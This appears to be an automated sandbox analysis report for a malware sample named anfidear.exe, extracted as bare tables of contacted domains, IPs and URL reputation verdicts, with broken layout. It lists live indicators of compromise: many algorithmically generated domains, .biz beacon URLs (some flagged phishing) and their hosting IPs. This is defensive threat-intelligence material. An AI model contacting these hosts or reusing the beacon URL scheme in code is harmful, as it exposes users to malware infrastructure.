https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%Avira URL Cloudsafe
http://%s.biz/d/N?0%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?0228C42DC328C42DC31AC401C328C40F9F3C20E75128C41BED1AEA14F118F403C30%Avira URL Cloudsafe
http://unmomis.biz/d/N?029290CC2B9290CC2BA090E02B9290EE77867406B99290FA05A0BEF519A2A0E22B0%Avira URL Cloudsafe
http://argunoos.biz/d/N?020C5067260C5067263E504B260C50457A18B4ADB40C5051083E7E5E143C6049260%Avira URL Cloudsafe
http://argunoos.biz/d/N?02501DD36E501DD36E621DFF6E501DF13244F919FC501DE5406233EA5C602DFD6E0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02ECA9A87AECA9A87ADEA9847AECA98A26F84D62E8ECA99E54DE879148DC99867A100%Avira URL Cloudphishing
http://unmomis.biz/d/N?02D0BDE735D0BDE735E2BDCB35D0BDC569C4592DA7D0BDD11BE293DE07E08DC9350%Avira URL Cloudsafe
http://argunoos.biz/d/N?02D0FF33C8D0FF33C8E2FF1FC8D0FF1194C41BF95AD0FF05E6E2D10AFAE0CF1DC80%Avira URL Cloudsafe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark0%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?02B84E71A2B84E71A28A4E5DA2B84E53FEACAABB30B84E478C8A604890887E5FA20%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02B2922A64B2922A6480920664B2920838A676E0F6B2921C4A80BC135682A20464100%Avira URL Cloudphishing
http://unmomis.biz/d/N?028CE06A3B8CE06A3BBEE0463B8CE048679804A0A98CE05C15BECE5309BCD0443B0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02357B2A20357B2A20077B0620357B087C219FE0B2357B1C0E07551312054B0420100%Avira URL Cloudphishing
http://argunoos.biz/d/N?028C1E3A398C1E3A39BE1E16398C1E186598FAF0AB8C1E0C17BE30030BBC2E14390%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02CCF84FD9CCF84FD9FEF863D9CCF86D85D81C854BCCF879F7FED676EBFCC861D9100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02228A7717228A7717108A5B17228A554B366EBD85228A413910A44E2512BA5917100%Avira URL Cloudphishing
http://isfusus-omoab.biz/d/N?02E45A11EAE45A11EAD65A3DEAE45A33B6F0BEDB78E45A27C4D67428D8D46A3FEA0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02F561B7A4F561B7A4C7619BA4F56195F8E1857D36F561818AC74F8E96C55199A4100%Avira URL Cloudphishing
http://unmomis.biz/d/N?029C20DE179C20DE17AE20F2179C20FC4B88C414859C20E839AE0EE725AC10F0170%Avira URL Cloudsafe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%Avira URL Cloudsafe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02644F3816644F3816564F1416644F1A4A70ABF284644F0E3856610124547F1616100%Avira URL Cloudphishing
http://argunoos.biz/d/N?02083C1BF1083C1BF13A3C37F1083C39AD1CD8D163083C2DDF3A1222C3380C35F10%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?0208E0CC2308E0CC233AE0E02308E0EE7F1C0406B108E0FA0D3ACEF51138D0E223100%Avira URL Cloudphishing
http://unmomis.biz/d/N?02B615D577B615D5778415F977B615F72BA2F11FE5B615E359843BEC458625FB770%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?02F6C3C21AF6C3C21AC4C3EE1AF6C3E046E2270888F6C3F434C4EDFB28C6F3EC1A0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?022EFA15E32EFA15E31CFA39E32EFA37BF3A1EDF712EFA23CD1CD42CD11ECA3BE3100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?025DBFE07E5DBFE07E6FBFCC7E5DBFC222495B2AEC5DBFD6506F91D94C6D8FCE7E100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?02AA679484AA6794849867B884AA67B6D8BE835E16AA67A2AA9849ADB69A57BA84100%Avira URL Cloudphishing
http://argunoos.biz/d/N?022C70E7482C70E7481E70CB482C70C51438942DDA2C70D1661E5EDE7A1C40C9480%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?028CFCCC358CFCCC35BEFCE0358CFCEE69981806A78CFCFA1BBED2F507BCCCE2350%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02987A36F4987A36F4AA7A1AF4987A14A88C9EFC66987A00DAAA540FC6A84A18F4100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?024449ADAD4449ADAD764981AD44498FF150AD673F44499B837667949F747983AD100%Avira URL Cloudphishing
http://argunoos.biz/d/N?0224F5EE5624F5EE5616F5C25624F5CC0A301124C424F5D87816DBD76414C5C0560%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?0226EE6A2826EE6A2814EE462826EE4874320AA0BA26EE5C0614C0531A16DE4428100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?028CF41BD68CF41BD6BEF437D68CF4398A9810D1448CF42DF8BEDA22E4BCC435D6100%Avira URL Cloudphishing
http://unmomis.biz/d/N?02D04154BED04154BEE24178BED04176E2C4A59E2CD0416290E26F6D8CE0717ABE0%Avira URL Cloudsafe
http://unmomis.biz/d/N?025B00FDB05B00FDB06900D1B05B00DFEC4FE437225B00CB9E692EC4826B30D3B00%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?020AA6280F0AA6280F38A6040F0AA60A531E42E29D0AA61E213888113D3A96060F100%Avira URL Cloudphishing
http://unmomis.biz/d/N?0266915CED66915CED549170ED66917EB17275967F66916AC354BF65DF56A172ED0%Avira URL Cloudsafe
http://schemas.micro0%Avira URL Cloudsafe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?0228989BB528989BB51A98B7B52898B9E93C7C51272898AD9B1AB6A28718A8B5B5100%Avira URL Cloudphishing
http://unmomis.biz/d/N?02C42D6ED0C42D6ED0F62D42D0C42D4C8CD0C9A442C42D58FEF60357E2F41D40D00%Avira URL Cloudsafe
https://api.msn.com/v1/news/Feed/Windows?activityId=8B2A0224B153403AA00C6B7A3F8B99F4&timeOut=5000&oc0%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?0298E6EA3A98E6EA3AAAE6C63A98E6C8668C0220A898E6DC14AAC8D308A8D6C43A0%Avira URL Cloudsafe
http://argunoos.biz/d/N?024497CF864497CF867697E3864497EDDA507305144497F9A876B9F6B474A7E1860%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?02DF8866EBDF8866EBED884AEBDF8844B7CB6CAC79DF8850C5EDA65FD9EFB848EB0%Avira URL Cloudsafe
http://argunoos.biz/d/N?020C7846AF0C7846AF3E786AAF0C7864F3189C8C3D0C7870813E567F9D3C4868AF0%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?025257D9F95257D9F96057F5F95257FBA546B3136B5257EFD76079E0CB6267F7F90%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
vfugnlrfi.ph
45.79.222.138
truefalse
    unknown
    oepwziolkasrnq.ph
    45.79.222.138
    truefalseunknown
    lrnmqjyreikkk.ph
    45.79.222.138
    truefalseunknown
    ojykg.ph
    45.79.222.138
    truefalseunknown
    mkxsdgyrsnuny.ph
    45.79.222.138
    truefalse
      unknown
      xwygeqmmxmx.ws
      64.70.19.203
      truefalseunknown
      moayueuir.ws
      64.70.19.203
      truefalseunknown
      wdekkqy.ph
      45.79.222.138
      truefalseunknown
      tjmgkenb.vg
      88.198.29.97
      truefalseunknown
      ouuhxcrgcyy.vg
      88.198.29.97
      truefalseunknown
      jfziaqsqc.ws
      64.70.19.203
      truefalseunknown
      wmqukxacykyoqu.ws
      64.70.19.203
      truefalseunknown
      czgvgqx.vg
      88.198.29.97
      truefalseunknown
      qhsyj.ws
      64.70.19.203
      truefalseunknown
      wwwtmlycixa.ws
      64.70.19.203
      truefalseunknown
      dhseo.vg
      88.198.29.97
      truefalse
        unknown
        sekohlmoeb.vg
        88.198.29.97
        truefalseunknown
        qzmzqqokwibp.vg
        88.198.29.97
        truefalseunknown
        egvcu.ph
        45.79.222.138
        truefalseunknown
        yeqsiakjrkzcgn.ws
        64.70.19.203
        truefalseunknown
        ibuda.ws
        64.70.19.203
        truefalseunknown
        jirrckkskcgfuk.vg
        88.198.29.97
        truefalseunknown
        ksacguagw.vg
        88.198.29.97
        truefalseunknown
        tggksvbebwrcu.ws
        64.70.19.203
        truefalseunknown
        kkugbysfjzw.ph
        45.79.222.138
        truefalseunknown
        oqueq.ph
        45.79.222.138
        truefalse
          unknown
          exlfcsmiiud.ws
          64.70.19.203
          truefalse
            unknown
            qdgiqwuzkfm.vg
            88.198.29.97
            truefalse
              unknown
              mjlgadcmryrzm.vg
              88.198.29.97
              truefalse
                unknown
                ocvix.ph
                45.79.222.138
                truefalse
                  unknown
                  xuuussa.ph
                  45.79.222.138
                  truefalse
                    unknown
                    momdc.vg
                    88.198.29.97
                    truefalse
                      unknown
                      ojajroucusd.ws
                      64.70.19.203
                      truefalse
                        unknown
                        skyoujqckw.ph
                        45.79.222.138
                        truefalse
                          unknown
                          hrgovxgunqipw.ph
                          45.79.222.138
                          truefalse
                            unknown
                            imocob.vg
                            88.198.29.97
                            truefalse
                              unknown
                              bcwihlwez.vg
                              88.198.29.97
                              truefalse
                                unknown
                                muwwwceoexme.vg
                                88.198.29.97
                                truefalse
                                  unknown
                                  waxucwnjgkcgg.ph
                                  45.79.222.138
                                  truefalse
                                    unknown
                                    vrjtoa.ws
                                    64.70.19.203
                                    truefalse
                                      unknown
                                      yqqvkiancwh.ph
                                      45.79.222.138
                                      truefalse
                                        unknown
                                        qclczlkmgu.ph
                                        45.79.222.138
                                        truefalse
                                          unknown
                                          aynju.vg
                                          88.198.29.97
                                          truefalse
                                            unknown
                                            nosaprz.ws
                                            64.70.19.203
                                            truefalse
                                              unknown
                                              yejcjzwctwukz.ph
                                              45.79.222.138
                                              truefalse
                                                unknown
                                                uwkoaveeq.ph
                                                45.79.222.138
                                                truefalse
                                                  unknown
                                                  mkqoc.vg
                                                  88.198.29.97
                                                  truefalse
                                                    unknown
                                                    mgoywzkusfqhiq.vg
                                                    88.198.29.97
                                                    truefalse
                                                      unknown
                                                      ghtmfguneugikd.vg
                                                      88.198.29.97
                                                      truefalse
                                                        unknown
                                                        bwenqrwgiaihf.vg
                                                        88.198.29.97
                                                        truefalse
                                                          unknown
                                                          viiaotleq.ws
                                                          64.70.19.203
                                                          truefalse
                                                            unknown
                                                            rhickthksz.ph
                                                            45.79.222.138
                                                            truefalse
                                                              unknown
                                                              lkmwbwt.ws
                                                              64.70.19.203
                                                              truefalse
                                                                unknown
                                                                owkkgrfcok.ph
                                                                45.79.222.138
                                                                truefalse
                                                                  unknown
                                                                  aeoiglgdybz.ph
                                                                  45.79.222.138
                                                                  truefalse
                                                                    unknown
                                                                    rpuva.vg
                                                                    88.198.29.97
                                                                    truefalse
                                                                      unknown
                                                                      gqesbimbmu.ws
                                                                      64.70.19.203
                                                                      truefalse
                                                                        unknown
                                                                        egqafiwiaqocq.vg
                                                                        88.198.29.97
                                                                        truefalse
                                                                          unknown
                                                                          xiyiwutkhkw.ws
                                                                          64.70.19.203
                                                                          truefalse
                                                                            unknown
                                                                            uussbebca.vg
                                                                            88.198.29.97
                                                                            truefalse
                                                                              unknown
                                                                              oozpkcg.ws
                                                                              64.70.19.203
                                                                              truefalse
                                                                                unknown
                                                                                ukzyikviofoas.ws
                                                                                64.70.19.203
                                                                                truefalse
                                                                                  unknown
                                                                                  omugeaoywwi.vg
                                                                                  88.198.29.97
                                                                                  truefalse
                                                                                    unknown
                                                                                    uzhqapkl.ph
                                                                                    45.79.222.138
                                                                                    truefalse
                                                                                      unknown
                                                                                      qgqdcwm.ph
                                                                                      45.79.222.138
                                                                                      truefalse
                                                                                        unknown
                                                                                        rkqes.vg
                                                                                        88.198.29.97
                                                                                        truefalse
                                                                                          unknown
                                                                                          fwxpi.vg
                                                                                          88.198.29.97
                                                                                          truefalse
                                                                                            unknown
                                                                                            trdaizzmc.ws
                                                                                            64.70.19.203
                                                                                            truefalse
                                                                                              unknown
                                                                                              ibkxqgyeoopjy.ws
                                                                                              64.70.19.203
                                                                                              truefalse
                                                                                                unknown
                                                                                                chppyqkp.vg
                                                                                                88.198.29.97
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  akeismim.vg
                                                                                                  88.198.29.97
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    xoeehczikrlok.ws
                                                                                                    64.70.19.203
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      yulrunpmqx.ws
                                                                                                      64.70.19.203
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        wyiutviawsfdc.ph
                                                                                                        45.79.222.138
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          rwaougs.ws
                                                                                                          64.70.19.203
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            bqcksybkwws.vg
                                                                                                            88.198.29.97
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              coykrvafpuizlk.ph
                                                                                                              45.79.222.138
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                wbtyq.ws
                                                                                                                64.70.19.203
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  oqedqmaaasm.vg
                                                                                                                  88.198.29.97
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    ugskus.ph
                                                                                                                    45.79.222.138
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      qepykieokha.ws
                                                                                                                      64.70.19.203
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        iaxnaf.ph
                                                                                                                        45.79.222.138
                                                                                                                        truefalse
                                                                                                                          unknown
                                                                                                                          vxxklygmoyyj.vg
                                                                                                                          88.198.29.97
                                                                                                                          truefalse
                                                                                                                            unknown
                                                                                                                            ekuoz.ws
                                                                                                                            64.70.19.203
                                                                                                                            truefalse
                                                                                                                              unknown
                                                                                                                              wuaizix.ws
                                                                                                                              64.70.19.203
                                                                                                                              truefalse
                                                                                                                                unknown
                                                                                                                                odpusvdhh.vg
                                                                                                                                88.198.29.97
                                                                                                                                truefalse
                                                                                                                                  unknown
                                                                                                                                  ukbwlyfymnhyha.ph
                                                                                                                                  45.79.222.138
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    aooxybqcnmauq.vg
                                                                                                                                    88.198.29.97
                                                                                                                                    truefalse
                                                                                                                                      unknown
                                                                                                                                      wvklifx.ph
                                                                                                                                      45.79.222.138
                                                                                                                                      truefalse
                                                                                                                                        unknown
                                                                                                                                        mdzlykq.vg
                                                                                                                                        88.198.29.97
                                                                                                                                        truefalse
                                                                                                                                          unknown
                                                                                                                                          utbidet-ugeas.biz
                                                                                                                                          172.234.222.138
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            veimagu.ph
                                                                                                                                            45.79.222.138
                                                                                                                                            truefalse
                                                                                                                                              unknown
                                                                                                                                              imvojuiuy.ph
                                                                                                                                              45.79.222.138
                                                                                                                                              truefalse
                                                                                                                                                unknown
                                                                                                                                                isaatieqykghz.vg
                                                                                                                                                88.198.29.97
                                                                                                                                                truefalse
                                                                                                                                                  unknown
                                                                                                                                                  wmbglyuglyui.ph
                                                                                                                                                  45.79.222.138
                                                                                                                                                  truefalse
                                                                                                                                                    unknown
                                                                                                                                                    wqricahmuvyywk.ph
                                                                                                                                                    45.79.222.138
                                                                                                                                                    truefalse
                                                                                                                                                      unknown
                                                                                                                                                      cxmse.vg
                                                                                                                                                      88.198.29.97
                                                                                                                                                      truefalse
                                                                                                                                                        unknown
                                                                                                                                                        fkvea.ws
                                                                                                                                                        64.70.19.203
                                                                                                                                                        truefalse
                                                                                                                                                          unknown
                                                                                                                                                          mrpbwiwiobyk.vg
                                                                                                                                                          88.198.29.97
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            sclqexyj.vg
                                                                                                                                                            88.198.29.97
                                                                                                                                                            truefalse
                                                                                                                                                              unknown
                                                                                                                                                              NameMaliciousAntivirus DetectionReputation
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02EC71869EEC71869EDE71AA9EEC71A4C2F8954C0CEC71B0B0DE5FBFACDC41A89Etrue
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?020C6411C80C6411C83E643DC80C6433941880DB5A0C6427E63E4A28FA3C543FC8true
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02C22D9D4EC22D9D4EF02DB14EC22DBF12D6C957DCC22DAB60F003A47CF21DB34Efalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?028CE4BE0E8CE4BE0EBEE4920E8CE49C529800749C8CE48820BECA873CBCD4900Efalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?020FD0EDC80FD0EDC83DD0C1C80FD0CF941B34275A0FD0DBE63DFED4FA3FE0C3C8false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02F01E3F00F01E3F00C21E1300F01E1D5CE4FAF592F01E092EC2300632C02E1100false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02D1AD1CC6D1AD1CC6E3AD30C6D1AD3E9AC549D654D1AD2AE8E38325F4E19D32C6false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?025C30053D5C30053D6E30293D5C30276148D4CFAF5C3033136E1E3C0F6C002B3Dfalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02BE549BBBBE549BBB8C54B7BBBE54B9E7AAB05129BE54AD958C7AA2898E64B5BBfalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?0298E2C40A98E2C40AAAE2E80A98E2E6568C060E9898E2F224AACCFD38A8D2EA0Afalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02ECA9A87AECA9A87ADEA9847AECA98A26F84D62E8ECA99E54DE879148DC99867Afalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02B2922A64B2922A6480920664B2920838A676E0F6B2921C4A80BC135682A20464false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02357B2A20357B2A20077B0620357B087C219FE0B2357B1C0E07551312054B0420false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02CCF84FD9CCF84FD9FEF863D9CCF86D85D81C854BCCF879F7FED676EBFCC861D9false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02228A7717228A7717108A5B17228A554B366EBD85228A413910A44E2512BA5917false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02F561B7A4F561B7A4C7619BA4F56195F8E1857D36F561818AC74F8E96C55199A4false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02644F3816644F3816564F1416644F1A4A70ABF284644F0E3856610124547F1616false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?0208E0CC2308E0CC233AE0E02308E0EE7F1C0406B108E0FA0D3ACEF51138D0E223false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?022EFA15E32EFA15E31CFA39E32EFA37BF3A1EDF712EFA23CD1CD42CD11ECA3BE3false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?025DBFE07E5DBFE07E6FBFCC7E5DBFC222495B2AEC5DBFD6506F91D94C6D8FCE7Efalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02AA679484AA6794849867B884AA67B6D8BE835E16AA67A2AA9849ADB69A57BA84false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?02987A36F4987A36F4AA7A1AF4987A14A88C9EFC66987A00DAAA540FC6A84A18F4false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?024449ADAD4449ADAD764981AD44498FF150AD673F44499B837667949F747983ADfalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?0226EE6A2826EE6A2814EE462826EE4874320AA0BA26EE5C0614C0531A16DE4428false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?028CF41BD68CF41BD6BEF437D68CF4398A9810D1448CF42DF8BEDA22E4BCC435D6false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?020AA6280F0AA6280F38A6040F0AA60A531E42E29D0AA61E213888113D3A96060Ffalse
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              http://utbidet-ugeas.biz/d/N?0228989BB528989BB51A98B7B52898B9E93C7C51272898AD9B1AB6A28718A8B5B5false
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                              http://argunoos.biz/d/N?02F4389205F4389205C638BE05F438B059E0DC5897F438A42BC616AB37C408BC05anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?023F5830C33F5830C30D581CC33F58129F2BBCFA513F5806ED0D7609F10F681EC3anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?027A020A257A020A25480226257A0228796EE6C0B77A023C0B482C33174A322425anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://android.notify.windows.com/iOSOexplorer.exe, 00000005.00000000.2329528909.000000000BF7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000002.4779334908.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2324403319.0000000006E21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4781575407.0000000008810000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008810000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://android.notify.windows.com/iOSNexplorer.exe, 00000005.00000000.2329528909.000000000BF7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02AA9B7950AA9B7950989B5550AA9B5B0CBE7FB3C2AA9B4F7E98B540629AAB5750anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?022200EEDE2200EEDE1000C2DE2200CC8236E4244C2200D8F0102ED7EC1230C0DEanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?020FAECEA10FAECEA13DAEE2A10FAEECFD1B4A04330FAEF88F3D80F7933F9EE0A1anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000005.00000002.4781575407.0000000008701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008701000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02783D303B783D303B4A3D1C3B783D12676CD9FAA9783D06154A130909480D1E3Banfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?025AF9B0D95AF9B0D968F99CD95AF992854E1D7A4B5AF986F768D789EB6AC99ED9anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02B6A25941B6A2594184A27541B6A27B1DA24693D3B6A26F6F848C607386927741anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02BE7E52F1BE7E52F18C7E7EF1BE7E70ADAA9A9863BE7E64DF8C506BC38E4E7CF1anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?0216F0E01C16F0E01C24F0CC1C16F0C24002142A8E16F0D63224DED92E26C0CE1Canfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://isfusus-omoab.biz/d/N?0204BF06E004BF06E036BF2AE004BF24BC105BCC7204BF30CE36913FD2348F28E0anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?027E74C03B7E74C03B4C74EC3B7E74E2676A900AA97E74F6154C5AF9094E44EE3Banfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?02A8648022A86480229A64AC22A864A27EBC804AB0A864B60C9A4AB9109854AE22anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?025ACD21165ACD211668CD0D165ACD034A4E29EB845ACD173868E318246AFD0F16anfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://unmomis.biz/d/N?020CD6A67F0CD6A67F3ED68A7F0CD6842318326CED0CD690513EF89F4D3CE6887Fanfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://argunoos.biz/d/N?027AECC80B7AECC80B48ECE40B7AECEA576E0802997AECFE2548C2F1394ADCE60Banfidear.exe, 00000001.00000002.4776932794.0000000002C82000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
